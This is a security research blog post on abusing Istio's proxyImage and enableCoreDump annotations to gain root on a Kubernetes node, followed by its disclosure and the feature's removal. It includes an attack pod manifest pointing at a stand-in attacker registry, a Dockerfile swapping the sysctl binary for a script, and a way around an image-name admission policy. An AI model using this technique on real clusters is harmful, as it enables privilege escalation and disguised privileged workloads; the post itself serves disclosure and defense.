Improving Kubernetes Security: Lessons from an Istio Configuration Finding

As part of our ongoing work to secure cloud computing infrastructure, we delved into the inner workings of several popular Kubernetes add-ons. Our first research subject was Istio, a widely used service mesh add-on.

Istio is an open-source service mesh for Kubernetes that manages communication between microservices. It provides traffic management, security, and observability features without requiring code changes. Istio simplifies complex networking tasks, enhances security, and offers detailed insights into service interactions, improving overall application reliability and performance.

Our research focused on abusing features of these add-ons to gain additional access, escalate privileges in the cluster, or hide malicious privileged workloads "in the noise" of a busy cluster. While looking into Istio, we wanted to enumerate the avenues an attacker could take advantage of to gain control of a cluster after successfully exploiting a workload.

In this blog post, we cover the Istio feature that we chose to focus on in our research: the ProxyImage annotation. We share our research process, findings, possible ramifications, and the disclosure and remediation process.

The Impact of K8s Add-ons on Security

Kubernetes add-ons are components that extend the functionality, scalability, security, and management capabilities of a cluster. Popular add-ons include Prometheus, Grafana, Istio, Linkerd, and Argo. For managed clusters such as Amazon EKS, add-ons exist to integrate the cluster more tightly with AWS and to simplify tasks such as managing persistent volumes. Similar add-ons exist for other cloud providers as well.

When add-ons are installed, they often extend the capabilities of a cluster via the operator pattern, processing resources specified with custom resource definitions (CRDs). Other add-ons use admission webhooks to modify workloads so that they conform to a desired pattern. Istio, for example, can be deployed in a way that modifies workloads to include the components Istio needs to function. Each of these add-ons increases the configurability and usability of the cluster, but it also increases the attack surface: every new configuration option is a potential avenue that could be abused to gain additional access to a cluster.

Istio Overview

Istio is an open-source service mesh platform that helps organizations manage, secure, and observe microservices-based applications. A service mesh is a configurable infrastructure layer that sits between microservices, managing communication, security, and observability between them. It acts as a network of proxies that intercept and manage traffic between services.

Istio provides a uniform way to connect, manage, and secure microservices, allowing developers to focus on writing code without worrying about underlying infrastructure. According to the main Istio page, “Istio extends Kubernetes to establish a programmable, application-aware network.”

Istio Details

Istio's modus operandi is rather complex. When configured to operate in sidecar mode, it injects a sidecar container that acts as a transparent proxy, grabbing all traffic in and out of the workload container. In addition to the sidecar container, an initialization container is created to modify the pod's traffic flow so that the proxy container receives all ingress and egress traffic associated with the workload. This topology shaping is done by a series of intricate iptables rules, which in turn create the appearance of a "flat network."

Naturally, such "network tricks" can cause errors, and to debug them a cluster admin needs access to an environment or tool that lets them run arbitrary commands and inspect the service mesh. Since we are discussing a Kubernetes cluster, and not a single Linux machine, standing up the infrastructure to run these debugging processes is more complex than usual, due to containerization, permissions, namespaces, and so on.
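To illustrate, the redirection established by the init container boils down to NAT rules along these lines. This is a simplified sketch assuming Istio's default proxy ports (15006 inbound, 15001 outbound); the real istio-iptables program creates dedicated ISTIO_* chains and handles numerous exclusions.

```bash
# Simplified sketch of the redirection istio-init configures for a pod
# (defaults assumed; the actual rules use dedicated ISTIO_* chains).

# Inbound TCP traffic is redirected to the sidecar proxy's inbound port (15006).
iptables -t nat -A PREROUTING -p tcp -j REDIRECT --to-ports 15006

# Outbound TCP traffic from the application is redirected to the proxy's
# outbound port (15001); traffic from the proxy itself (UID 1337 by
# convention) is excluded to avoid a redirect loop.
iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1337 -j REDIRECT --to-ports 15001
```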

While exploring the Istio documentation, we found that there are various annotations a user (a non-admin cluster user) can set in order to affect various resources inside the service mesh. Two annotations in particular caught our eye. One is sidecar.istio.io/proxyImage, which allows the user to specify which proxy image to use (that is, which version of the Envoy-based proxy).

Figure 1. ProxyImage definition from the official Istio documentation

However, this annotation can also be used to load a completely different image that has nothing to do with Envoy. We wanted to see how we could use it to do exactly that: load a different container carrying our own set of tools alongside the "regular" workloads.

The second annotation is sidecar.istio.io/enableCoreDump, which causes an additional init container to be injected that runs with privileged capabilities such as CAP_SYS_ADMIN.

Figure 2. enableCoreDump definition from the official Istio documentation

Amusingly enough, this annotation was added to Istio as a result of a GitHub issue (Figure 3) in which a user wanted to debug a specific case that required taking a core dump to examine the memory of the proxy process. The feature was merged into Istio back in January 2020.

Figure 3. GitHub issue requesting enableCoreDump feature

Scenario Overview

Our scenario assumes that a vulnerable workload was exploited in order to get a shell on the pod running it. Once the attackers find themselves with a shell, they are fairly limited in what they can do on the pod they have "landed on." They only have access to whatever is installed on the pod, without a convenient way to escalate privileges or run their own tools. Conceptually, the scenario is the following:

  1. An attacker successfully exploits a web application that lands them in a shell on the pod.
  2. The attacker would then enumerate their Kubernetes privileges to see whether they can spin up a new container (a quick check is sketched after this list).
  3. The attacker would then leverage Istio annotations to deploy a new pod whose injected debug container runs a custom proxy image with CAP_SYS_ADMIN capabilities.
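For step 2, the enumeration from inside the compromised pod might look like the following. This is an illustrative sketch; it assumes kubectl (or equivalent direct API access) is available in the pod.

```bash
# Check whether the current identity can create pods in this namespace.
kubectl auth can-i create pods

# List everything the current identity is allowed to do in this namespace.
kubectl auth can-i --list
```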

Scenario Details

When a workload is deployed, Istio modifies the workload's init containers. It adds an initialization container called "istio-init" that runs with the CAP_NET_ADMIN capability to modify the pod's iptables rules so that all ingress and egress traffic related to the pod is sent through the "istio-proxy" container. (Linux capabilities are a set of privileges that can be assigned to a process, allowing it to perform specific actions without requiring full root access; a full list can be found on the capabilities man page.) If configured, a debug container can also be created during the init process to help troubleshoot the proxy by taking core dumps. The debug container runs with the CAP_SYS_ADMIN capability.

As a workload owner, you can influence the configuration Istio applies by adding various annotations to the workload definition. A full list of the available annotations can be found on Istio's resource annotations documentation page. Two annotations worth noting are sidecar.istio.io/enableCoreDump: "true", which enables the debug container, and sidecar.istio.io/proxyImage, which allows a workload owner to specify a custom Istio proxy image. We found that this annotation also influences the image used by both of the initialization containers.

With these annotations, we could request that Istio inject a privileged container into our pod and have it use an image of our choosing.
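The manifest we deployed is not reproduced here; a minimal sketch of such a pod definition looks like the following (the image reference evil-registry.example.com/istio/proxyv2:latest is a hypothetical placeholder for our custom image):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: demo-app
  annotations:
    # Hypothetical custom image; Istio's injector uses it for the sidecar
    # and the init containers it adds to the pod.
    sidecar.istio.io/proxyImage: "evil-registry.example.com/istio/proxyv2:latest"
    # Requests the privileged (CAP_SYS_ADMIN) core dump init container.
    sidecar.istio.io/enableCoreDump: "true"
spec:
  containers:
  - name: app
    image: nginx:1.25   # ordinary workload container
```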

The core dump container is granted SYS_ADMIN but drops all other capabilities. This means that making a direct network call from this container is not possible. However, SYS_ADMIN does give us the ability to escape to the host filesystem.

Through annotations, we can influence the image being used, but we cannot change the command the container runs at startup (this is defined in the istio-sidecar-injector configmap in the istio-system namespace). This makes things slightly more complicated, but since we control the image, we can simply place a malicious file at the path of the command being invoked. In this case, the command invoked by the core dump init container is sysctl -w kernel.core_pattern=/var/lib/istio/data/core.proxy. We created a simple bash script to take its place.
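The script itself is not reproduced in this post; the harmless placeholder below illustrates the substitution (in a real attack, the payload performing the host escape would go where indicated):

```bash
#!/bin/bash
# Stand-in for the real sysctl binary inside our custom image. The injector
# still invokes "sysctl -w kernel.core_pattern=...", but this script runs
# instead, inheriting the init container's CAP_SYS_ADMIN capability.
echo "fake sysctl invoked with args: $@" >> /tmp/poc.log
grep Cap /proc/self/status >> /tmp/poc.log
# <payload abusing CAP_SYS_ADMIN would go here>
```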

Then, during the image build process, we overwrite the sysctl binary with our script.
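A minimal Dockerfile sketch of that build, assuming the script above is saved as sysctl.sh next to the Dockerfile (the base image tag and the sysctl path are assumptions to verify against the base image):

```dockerfile
# Build on the stock proxy image so istio-iptables and the rest of the
# expected tooling keep working as usual.
FROM docker.io/istio/proxyv2:1.23.0

# Replace the real sysctl binary with our script (path assumed; confirm
# with "which sysctl" inside the base image).
COPY sysctl.sh /usr/sbin/sysctl
RUN chmod +x /usr/sbin/sysctl
```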

We opted to use the "default" Istio proxy image as our base image so that the istio-init container responsible for running istio-iptables would work as expected. We could have used any other image and replaced the istio-iptables binary with a malicious file instead, but SYS_ADMIN is a far more damaging capability than NET_ADMIN.

To make our testing more realistic, we created a non-admin user account in the Kubernetes cluster. This account has permissions to get, list, and create pods, plus standard get permissions on a handful of other resources.
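The exact RBAC role bound to this account is not listed above; a role along the following lines would be sufficient for the scenario (the name, namespace, and the extra resources are illustrative):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: limited-workload-owner   # illustrative name
  namespace: demo
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "create"]
- apiGroups: [""]
  resources: ["services", "configmaps"]   # the "handful of other things"
  verbs: ["get"]
```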

With all of the pieces in place, we built the image and then deployed our pod with the required annotations. After a minute, we had a root shell on the node.

It is considered best practice to use admission controls to prevent the admission of workloads with capabilities that could lead to container escapes or otherwise harm the cluster. This becomes challenging when add-ons such as Istio require elevated capabilities to operate. Kyverno published a blog post earlier this year showing how a Kubernetes admin might use an admission policy that allows Istio components to have elevated capabilities while preventing other workloads from using them. However, even these examples need further work to close this gap: the example rule only requires that "*/istio/proxyv2*" appear in the image name, which is easily bypassed by giving the malicious image a name that satisfies the pattern. We bring this up not to point fingers at the Kyverno example policy but to show that limiting capabilities for most workloads while carving out exceptions for others quickly becomes a rabbit hole of "what ifs."
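For example, the hypothetical image reference used earlier in this post already satisfies such a pattern while pointing at a registry the attacker controls:

```yaml
# Matches a "*/istio/proxyv2*" image-name pattern, yet is pulled from an
# attacker-controlled registry (registry name is hypothetical).
sidecar.istio.io/proxyImage: "evil-registry.example.com/istio/proxyv2:latest"
```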

Disclosure

On Friday, October 4, 2024, we reached out to the Istio security team over email, detailing our findings and concerns. Our email was answered within 15 minutes (a new record), and a discussion of our findings began. Istio's security team disagreed with our findings, questioning whether there was an actual issue at all, because a user with sufficient privileges could spin up a privileged container regardless of Istio. While this argument is correct, spinning up a debug container with arbitrary code execution capabilities under the guise of Istio can make detection much more difficult in an actual attack, since an Istio debug container appears far more legitimate than an unaccounted-for "regular" privileged container. It may also bypass controls limiting the use of privileged containers in a cluster.

While the Istio team disagreed with us on the severity of our findings, they informed us that they had immediately opened a PR to remove the feature altogether. The PR was merged into Istio's main branch on October 7, 2024, removing the four-year-old feature.

Additional Resources

CrowdStrike 2025 Global Threat Report

Get your copy of the must-read cybersecurity report of the year.